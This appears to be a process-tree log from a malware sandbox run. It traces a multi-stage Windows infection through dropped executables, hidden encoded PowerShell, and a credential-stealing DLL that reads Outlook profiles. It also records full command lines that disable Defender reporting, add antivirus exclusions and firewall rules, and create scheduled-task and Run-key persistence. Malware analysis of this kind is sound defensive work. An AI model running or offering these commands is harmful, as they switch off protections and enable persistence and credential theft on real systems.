\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:6413⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "gwRDVoGdW" /SC once /ST 00:47:45 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="11⤵
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "gwRDVoGdW"11⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "gwRDVoGdW"11⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "byKByeoBcBZIhKbqIQ" /SC once /ST 11:57:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\ZGyBjbVKBwBPExFHM\oucUKIuPjfZayxv\pAsgXvX.exe\" Gd /site_id 525403 /S" /V1 /F11⤵
- Creates scheduled task(s)
-
C:\Users\Admin\Pictures\Adobe Films\u8ZFYWMkGwZ6lFQiLgd4Qx6i.exe"C:\Users\Admin\Pictures\Adobe Films\u8ZFYWMkGwZ6lFQiLgd4Qx6i.exe"8⤵
- Executes dropped EXE
- Adds Run key to start application
-
C:\Windows\SysWOW64\ftp.exeftp -?9⤵
-
C:\Windows\SysWOW64\cmd.execmd /c cmd < Esistenza.wbk9⤵
-
C:\Windows\SysWOW64\cmd.execmd10⤵
-
C:\Windows\SysWOW64\tasklist.exetasklist /FI "imagename eq BullGuardCore.exe"11⤵
- Enumerates processes with tasklist
-
C:\Windows\SysWOW64\find.exefind /I /N "bullguardcore.exe"11⤵
-
C:\Windows\SysWOW64\find.exefind /I /N "psuaservice.exe"11⤵
-
C:\Windows\SysWOW64\tasklist.exetasklist /FI "imagename eq PSUAService.exe"11⤵
- Enumerates processes with tasklist
-
C:\Windows\SysWOW64\findstr.exefindstr /V /R "^VBNKEZcFuClIqCwDfZLYyYSgBIFmwizNsZNbuKFwcrNiUBFraGQiScYWImpWzVEYpvswOEbFzKCelLzZeCux$" Dattero.wbk11⤵
-
C:\Windows\SysWOW64\PING.EXEping localhost -n 511⤵
- Runs ping.exe
-
C:\Users\Admin\Pictures\Adobe Films\M_Ut5iUT4OSEGqXXWioGLPDC.exe"C:\Users\Admin\Pictures\Adobe Films\M_Ut5iUT4OSEGqXXWioGLPDC.exe"8⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1604 -s 4609⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1604 -s 7649⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1604 -s 7729⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1604 -s 7969⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1604 -s 8049⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1604 -s 8569⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1604 -s 7889⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1604 -s 5489⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1604 -s 7889⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1604 -s 9489⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1604 -s 9809⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1604 -s 9889⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1604 -s 10369⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1604 -s 10329⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1604 -s 13249⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1604 -s 13489⤵
- Program crash
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im "M_Ut5iUT4OSEGqXXWioGLPDC.exe" /f & erase "C:\Users\Admin\Pictures\Adobe Films\M_Ut5iUT4OSEGqXXWioGLPDC.exe" & exit9⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im "M_Ut5iUT4OSEGqXXWioGLPDC.exe" /f10⤵
- Kills process with taskkill
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1604 -s 12889⤵
- Program crash
-
C:\Users\Admin\Pictures\Adobe Films\YLI7066OcjAjFzAQTdB_htca.exe"C:\Users\Admin\Pictures\Adobe Films\YLI7066OcjAjFzAQTdB_htca.exe"8⤵
- Executes dropped EXE
- Checks computer location settings
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\Pictures\Adobe Films\YLI7066OcjAjFzAQTdB_htca.exe"C:\Users\Admin\Pictures\Adobe Films\YLI7066OcjAjFzAQTdB_htca.exe" -h9⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\Pictures\Adobe Films\tkJrdn8F3sKOhFnyYfwdje4Z.exe"C:\Users\Admin\Pictures\Adobe Films\tkJrdn8F3sKOhFnyYfwdje4Z.exe"8⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\control.exe"C:\Windows\System32\control.exe" "C:\Users\Admin\AppData\Local\Temp\UZQjGrY.CPl",9⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl HR" /sc HOURLY /rl HIGHEST7⤵
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl LG" /sc ONLOGON /rl HIGHEST7⤵
- Creates scheduled task(s)
-
C:\Users\Admin\Pictures\Adobe Films\JYlzsN75ybn3j3Dz4jkklglv.exe"C:\Users\Admin\Pictures\Adobe Films\JYlzsN75ybn3j3Dz4jkklglv.exe"6⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4036 -s 17887⤵
- Program crash
-
C:\Users\Admin\Pictures\Adobe Films\hemKlCEErosikEWENZmJf9lZ.exe"C:\Users\Admin\Pictures\Adobe Films\hemKlCEErosikEWENZmJf9lZ.exe"6⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"7⤵
-
C:\Users\Admin\Pictures\Adobe Films\fgpr9vfqKY1rmT3BSQgfJC56.exe"C:\Users\Admin\Pictures\Adobe Films\fgpr9vfqKY1rmT3BSQgfJC56.exe"6⤵
- Executes dropped EXE
-
C:\Users\Admin\Pictures\Adobe Films\sE96siV0Wb7GixRWcmz6NbQh.exe"C:\Users\Admin\Pictures\Adobe Films\sE96siV0Wb7GixRWcmz6NbQh.exe"6⤵
- Executes dropped EXE
-
C:\Users\Admin\Pictures\Adobe Films\4N9cTm4BM0PQWSQ87DCdpbxD.exe"C:\Users\Admin\Pictures\Adobe Films\4N9cTm4BM0PQWSQ87DCdpbxD.exe"6⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"7⤵
-
C:\Users\Admin\Pictures\Adobe Films\m5SdReRteCl1sNBSlrbBKlZC.exe"C:\Users\Admin\Pictures\Adobe Films\m5SdReRteCl1sNBSlrbBKlZC.exe"6⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2324 -s 4527⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2324 -s 7727⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2324 -s 7807⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2324 -s 7967⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2324 -s 8047⤵
- Program crash
-
C:\Users\Admin\Pictures\Adobe Films\VXfICvNHmMX9lPkfx8j6MHmM.exe"C:\Users\Admin\Pictures\Adobe Films\VXfICvNHmMX9lPkfx8j6MHmM.exe"6⤵
- Executes dropped EXE
- Checks SCSI registry key(s)
- Suspicious behavior: MapViewOfSection
-
C:\Users\Admin\Pictures\Adobe Films\8GNQChXau7xLpyF5txp1pv6I.exe"C:\Users\Admin\Pictures\Adobe Films\8GNQChXau7xLpyF5txp1pv6I.exe"6⤵
- Executes dropped EXE
- Checks computer location settings
-
C:\Users\Admin\AppData\Local\Temp\8c7aecc852\orxds.exe"C:\Users\Admin\AppData\Local\Temp\8c7aecc852\orxds.exe"7⤵
- Executes dropped EXE
- Checks computer location settings
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders" /f /v Startup /t REG_SZ /d C:\Users\Admin\AppData\Local\Temp\8c7aecc852\8⤵
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders" /f /v Startup /t REG_SZ /d C:\Users\Admin\AppData\Local\Temp\8c7aecc852\9⤵
-
C:\Windows\SysWOW64\schtasks.exe"C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN orxds.exe /TR "C:\Users\Admin\AppData\Local\Temp\8c7aecc852\orxds.exe" /F8⤵
- Creates scheduled task(s)
-
C:\Users\Admin\AppData\Local\Temp\1000003001\sloa2.exe"C:\Users\Admin\AppData\Local\Temp\1000003001\sloa2.exe"8⤵
- Executes dropped EXE
- Checks computer location settings
- Drops file in Windows directory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath c:\windows\9⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath \\?\C:\Windows \9⤵
-
C:\Windows\System32\netsh.exe"C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="SvcHostX" dir=in action=allow program="C:\Windows\System\svchost.exe" enable=yes9⤵
-
C:\Windows\System32\netsh.exe"C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="SvcHostX" dir=out action=allow program="C:\Windows\System\svchost.exe" enable=yes9⤵
-
C:\Windows\SYSTEM32\schtasks.exeschtasks /create /sc minute /ED "11/02/2024" /mo 7 /tn "Timer" /tr c:\windows\system\svchost.exe /ru SYSTEM9⤵
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\rundll32.exe"C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\b51ecacb95f3fd\cred.dll, Main8⤵
- Blocklisted process makes network request
- Loads dropped DLL
- Accesses Microsoft Outlook profiles
- outlook_win_path
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4296 -s 8647⤵
- Program crash
-
C:\Users\Admin\Pictures\Adobe Films\TgvCR6Ksn_D8cmy5iRbvgDuK.exe"C:\Users\Admin\Pictures\Adobe Films\TgvCR6Ksn_D8cmy5iRbvgDuK.exe"6⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
-
C:\Users\Admin\Pictures\Adobe Films\TgvCR6Ksn_D8cmy5iRbvgDuK.exe"C:\Users\Admin\Pictures\Adobe Films\TgvCR6Ksn_D8cmy5iRbvgDuK.exe"7⤵
- Executes dropped EXE
- Checks computer location settings
- Adds Run key to start application
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Users\Admin\AppData\Local\0eb6d191-e709-4c78-a52e-eb7bd99d76e2" /deny *S-1-1-0:(OI)(CI)(DE,DC)8⤵
- Modifies file permissions
-
C:\Users\Admin\Pictures\Adobe Films\TgvCR6Ksn_D8cmy5iRbvgDuK.exe"C:\Users\Admin\Pictures\Adobe Films\TgvCR6Ksn_D8cmy5iRbvgDuK.exe" --Admin IsNotAutoStart IsNotTask8⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
-
C:\Users\Admin\Pictures\Adobe Films\TgvCR6Ksn_D8cmy5iRbvgDuK.exe"C:\Users\Admin\Pictures\Adobe Films\TgvCR6Ksn_D8cmy5iRbvgDuK.exe" --Admin IsNotAutoStart IsNotTask9⤵
- Executes dropped EXE
- Checks computer location settings
-
C:\Users\Admin\AppData\Local\812dfbd2-2607-466c-b181-bacef725542f\build2.exe"C:\Users\Admin\AppData\Local\812dfbd2-2607-466c-b181-bacef725542f\build2.exe"10⤵
- Suspicious use of SetThreadContext
-
C:\Users\Admin\AppData\Local\812dfbd2-2607-466c-b181-bacef725542f\build2.exe"C:\Users\Admin\AppData\Local\812dfbd2-2607-466c-b181-bacef725542f\build2.exe"11⤵
- Loads dropped DLL
-
C:\Users\Admin\Pictures\Adobe Films\So53wazmrPkawhA3cYbuPH5Y.exe"C:\Users\Admin\Pictures\Adobe Films\So53wazmrPkawhA3cYbuPH5Y.exe"6⤵
- Executes dropped EXE
-
C:\Users\Admin\Pictures\Adobe Films\I3KI2HH99rjhQ0Vc0alJ8oBe.exe"C:\Users\Admin\Pictures\Adobe Films\I3KI2HH99rjhQ0Vc0alJ8oBe.exe"6⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"7⤵
-
C:\Users\Admin\Pictures\Adobe Films\2ENweQ4WRn3yo9lOJ9uHQXOS.exe"C:\Users\Admin\Pictures\Adobe Films\2ENweQ4WRn3yo9lOJ9uHQXOS.exe"6⤵
- Executes dropped EXE
-
C:\Users\Admin\Pictures\Adobe Films\_s_EUJDkRYxCaFZxTQ8MM6wp.exe"C:\Users\Admin\Pictures\Adobe Films\_s_EUJDkRYxCaFZxTQ8MM6wp.exe"6⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"7⤵
-
C:\Users\Admin\Pictures\Adobe Films\zDdxYDM2KG7p8Uvua6rFnfFe.exe"C:\Users\Admin\Pictures\Adobe Films\zDdxYDM2KG7p8Uvua6rFnfFe.exe"6⤵
- Executes dropped EXE
-
C:\Users\Admin\Pictures\Adobe Films\iz3bDwFMw5uJao49aGr38jVs.exe"C:\Users\Admin\Pictures\Adobe Films\iz3bDwFMw5uJao49aGr38jVs.exe"6⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"7⤵
-
C:\Users\Admin\Pictures\Adobe Films\cXMssl1UmE2YRbu2Uqav9Yk5.exe"C:\Users\Admin\Pictures\Adobe Films\cXMssl1UmE2YRbu2Uqav9Yk5.exe"6⤵
- Executes dropped EXE
-
C:\Users\Admin\Pictures\Adobe Films\0aRFdZE9_fUleW1frq6YtOpF.exe"C:\Users\Admin\Pictures\Adobe Films\0aRFdZE9_fUleW1frq6YtOpF.exe"6⤵
- Executes dropped EXE
-
C:\Users\Admin\Pictures\Adobe Films\eRW3dKveOHcVDZ31kB7pnCgc.exe"C:\Users\Admin\Pictures\Adobe Films\eRW3dKveOHcVDZ31kB7pnCgc.exe"6⤵
- Executes dropped EXE
-
C:\Users\Admin\Pictures\Adobe Films\X32bEg5XWUdmJsVsdaIn8INF.exe"C:\Users\Admin\Pictures\Adobe Films\X32bEg5XWUdmJsVsdaIn8INF.exe"6⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"7⤵
-
C:\Users\Admin\Pictures\Adobe Films\W_fMPVZQQ2ClxJPNNM_uNWOc.exe"C:\Users\Admin\Pictures\Adobe Films\W_fMPVZQQ2ClxJPNNM_uNWOc.exe"6⤵
- Executes dropped EXE
- Adds Run key to start application
-
C:\Windows\SysWOW64\ftp.exeftp -?7⤵
-
C:\Windows\SysWOW64\cmd.execmd /c cmd < Esistenza.wbk7⤵
-
C:\Windows\SysWOW64\cmd.execmd8⤵
-
C:\Windows\SysWOW64\tasklist.exetasklist /FI "imagename eq BullGuardCore.exe"9⤵
- Enumerates processes with tasklist
-
C:\Windows\SysWOW64\find.exefind /I /N "bullguardcore.exe"9⤵
-
C:\Windows\SysWOW64\tasklist.exetasklist /FI "imagename eq PSUAService.exe"9⤵
- Enumerates processes with tasklist
-
C:\Windows\SysWOW64\find.exefind /I /N "psuaservice.exe"9⤵
-
C:\Windows\SysWOW64\findstr.exefindstr /V /R "^VBNKEZcFuClIqCwDfZLYyYSgBIFmwizNsZNbuKFwcrNiUBFraGQiScYWImpWzVEYpvswOEbFzKCelLzZeCux$" Dattero.wbk9⤵
-
C:\Windows\SysWOW64\PING.EXEping localhost -n 59⤵
- Runs ping.exe
-
C:\Users\Admin\Pictures\Adobe Films\15BmbDQR2ShSU6uOda3ueknM.exe"C:\Users\Admin\Pictures\Adobe Films\15BmbDQR2ShSU6uOda3ueknM.exe"6⤵
- Executes dropped EXE
- Loads dropped DLL
- Checks processor information in registry
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im 15BmbDQR2ShSU6uOda3ueknM.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\Pictures\Adobe Films\15BmbDQR2ShSU6uOda3ueknM.exe" & del C:\ProgramData\*.dll & exit7⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im 15BmbDQR2ShSU6uOda3ueknM.exe /f8⤵
- Kills process with taskkill
-
C:\Windows\SysWOW64\timeout.exetimeout /t 68⤵
- Delays execution with timeout.exe
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2424 -s 19207⤵
- Program crash
-
C:\Users\Admin\Pictures\Adobe Films\KwY0aK_FsYoqqbHWGSCzUjnd.exe"C:\Users\Admin\Pictures\Adobe Films\KwY0aK_FsYoqqbHWGSCzUjnd.exe"6⤵
- Executes dropped EXE
- Checks computer location settings
- Adds Run key to start application
- Suspicious use of SetThreadContext
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c timeout 457⤵
-
C:\Windows\SysWOW64\timeout.exetimeout 458⤵
- Delays execution with timeout.exe
-
C:\Users\Admin\AppData\Local\Temp\Aalaxdhmax1.exe"C:\Users\Admin\AppData\Local\Temp\Aalaxdhmax1.exe"7⤵
- Checks SCSI registry key(s)
- Suspicious behavior: MapViewOfSection
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeC:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe7⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Fri05851d7f13.exe4⤵
-
C:\Users\Admin\AppData\Local\Temp\7zS4BD25486\Fri05851d7f13.exeFri05851d7f13.exe5⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Fri0541e16ce794d258f.exe4⤵
-
C:\Users\Admin\AppData\Local\Temp\7zS4BD25486\Fri0541e16ce794d258f.exeFri0541e16ce794d258f.exe5⤵
- Executes dropped EXE
- Checks SCSI registry key(s)
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Fri05890d11cdb13f95e.exe4⤵
-
C:\Users\Admin\AppData\Local\Temp\7zS4BD25486\Fri05890d11cdb13f95e.exeFri05890d11cdb13f95e.exe5⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1448 -s 6164⤵
- Program crash
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Fri051e1e7444.exe4⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Fri053f5694ea31c9a.exe4⤵
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\7zS4BD25486\Fri053f5694ea31c9a.exeFri053f5694ea31c9a.exe1⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
-
C:\Users\Admin\AppData\Local\Temp\7zS4BD25486\Fri053f5694ea31c9a.exeC:\Users\Admin\AppData\Local\Temp\7zS4BD25486\Fri053f5694ea31c9a.exe2⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\7zS4BD25486\Fri051e1e7444.exeFri051e1e7444.exe1⤵
- Executes dropped EXE
- Checks computer location settings
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe"2⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=89.0.4389.114 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ffbbd1e4f50,0x7ffbbd1e4f60,0x7ffbbd1e4f703⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1708,1594390099942538988,18405011891947760238,131072 --lang=en-US --service-sandbox-type=network --mojo-platform-channel-handle=1768 /prefetch:83⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --field-trial-handle=1708,1594390099942538988,18405011891947760238,131072 --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=1720 /prefetch:23⤵
-
C:\Users\Admin\Pictures\Adobe Films\jP1qOWqCUu7X2Ey9N5XnB4Vv.exe"C:\Users\Admin\Pictures\Adobe Films\jP1qOWqCUu7X2Ey9N5XnB4Vv.exe"2⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 1448 -ip 14481⤵
-
C:\Windows\system32\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global1⤵
- Process spawned unexpected child process
-
C:\Windows\SysWOW64\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global2⤵
- Loads dropped DLL
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4600 -s 6083⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 520 -p 4600 -ip 46001⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 524 -p 4296 -ip 42961⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 544 -p 2324 -ip 23241⤵
-
C:\Windows\System32\CompPkgSrv.exeC:\Windows\System32\CompPkgSrv.exe -Embedding1⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 532 -p 2324 -ip 23241⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 540 -p 1604 -ip 16041⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 528 -p 2324 -ip 23241⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 536 -p 1604 -ip 16041⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 520 -p 2324 -ip 23241⤵
-
C:\Windows\system32\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\db.dll",global1⤵
- Process spawned unexpected child process
-
C:\Windows\SysWOW64\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\db.dll",global2⤵
- Loads dropped DLL
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3296 -s 6003⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 532 -p 1604 -ip 16041⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 488 -p 3296 -ip 32961⤵
-
C:\Users\Admin\AppData\Local\Temp\8c7aecc852\orxds.exeC:\Users\Admin\AppData\Local\Temp\8c7aecc852\orxds.exe1⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4500 -s 4882⤵
- Program crash
-
C:\Users\Admin\AppData\Local\Temp\E2A1.exeC:\Users\Admin\AppData\Local\Temp\E2A1.exe1⤵
- Checks BIOS information in registry
- Loads dropped DLL
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im E2A1.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\AppData\Local\Temp\E2A1.exe" & del C:\ProgramData\*.dll & exit2⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im E2A1.exe /f3⤵
- Kills process with taskkill
-
C:\Windows\SysWOW64\timeout.exetimeout /t 63⤵
- Delays execution with timeout.exe
-
C:\Windows\SysWOW64\explorer.exeC:\Windows\SysWOW64\explorer.exe1⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4352 -s 8762⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 544 -p 1604 -ip 16041⤵
-
C:\Windows\explorer.exeC:\Windows\explorer.exe1⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 560 -p 2324 -ip 23241⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==1⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 488 -p 1604 -ip 16041⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 480 -p 4352 -ip 43521⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 468 -p 2424 -ip 24241⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 548 -p 4500 -ip 45001⤵
-
C:\Users\Admin\AppData\Local\Temp\DDFA.exeC:\Users\Admin\AppData\Local\Temp\DDFA.exe1⤵
-
C:\Windows\SysWOW64\explorer.exeC:\Windows\SysWOW64\explorer.exe1⤵
-
